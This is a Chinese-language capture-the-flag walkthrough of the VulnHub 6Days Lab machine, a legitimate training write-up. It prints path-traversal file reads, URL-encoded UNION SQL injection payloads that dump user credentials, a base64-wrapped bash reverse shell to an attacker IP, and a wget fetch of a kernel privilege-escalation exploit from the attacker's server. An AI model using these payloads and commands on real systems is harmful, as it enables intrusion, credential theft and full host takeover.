vulnhub靶机--6Day_Lab-v1.0.1

项目地址

https://download.vulnhub.com/6daylab/6Days_Lab-v1.0.1.ova

靶机渗透

主机发现

arp-scan -l
nmap IP -sS

确定目标主机IP及端口，浏览器登录访问，尝试输入特殊字符引发错误，发现对符合'敏感，

该处可能存在SQL注入漏洞，返回原界面，查看网络数据包，发现有其他数据包请求

双击进入数据包，发现不论将src修改为何值都没有有效输出但是也没有错误显示或者拦截，打开burpsuite进行抓包，尝试重新发送，将src修改为index.php，回显了初始页面，说明该处存在目录路径漏洞

终端输入命令dirb http://192.168.70.130，遍历网页目录结构

修改src内容，访问每一个文件，要在后面添加.php，在config.php中发现了数据库密码，然后还可以查看checkpromo.php，发现了SQL查询语句内容

config.php

checkpromo.php

修改src值，查看apache默认配置文件，发现网站端口是在8080，但是只接受本地连接，因为在80端口输入的信息都被IPS拦截，所以我们可以通过该出漏洞访问8080端口针对checkpromo.php的promocode值进行SQL注入

/etc/apache2/sites-available/default

根据checkpromo.php的SQL查询内容构造payload，分别为

联合查询数据库名称：http://127.0.0.1:8080/checkpromo.php?promocode=1%2527union%2520select%2520database()%252C2%2523
联合查询数据表名称：http://127.0.0.1:8080/checkpromo.php?promocode=1%2527union%2520select%2520group_concat(table_name)%252C2%2520from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase()%2523
联合查询对应数据表行列：http://127.0.0.1:8080/checkpromo.php?promocode=1%2527union%2520select%2520group_concat(column_name)%252C2%2520from%2520information_schema.columns%2520where%2520table_schema%253Ddatabase()%2520and%2520table_name%253D%2527users%2527%2523
联合查询对应数据表行列内容：http://127.0.0.1:8080/checkpromo.php?promocode=1%2527union%2520select%2520group_concat(username%252Cpassword)%252C2%2520from%2520fancydb.users%2523

获得用户账号密码，andrea，SayNoToPentests，先前主机发现时靶机打开了23端口，所以我们使用ssh命令连接目标主机

但是没有回显内容，尝试进行反弹shell，在原终端输入nc -lvvp 4444，直接使用bash连接不行，要进行base64编码

bash -i >& /dev/tcp/攻击机IP/4444 0>&1   <-----base64编码

bash -c '{echo,base64编码}|{base64,-d}|{bash,-i}'  <------执行该命令

提权

这时候就能看到回显了，uname -a查看内核版本，另起一个终端，根据内核版本搜索脚本searchsploit 3.13.0，默认脚本位置为：/usr/share/exploitdb/exploits/+Path

为了让目标靶机下载该脚本，打开kali的apache服务，并且将该脚本复制到网站中让目标靶机可以下载

在靶机中输入wget http://攻击机IP/37292.c，目标靶机成功下载，因为是C文件，需要先进行编译，然后运行编译文件即可

在/home文件夹可以看到flag，运行即可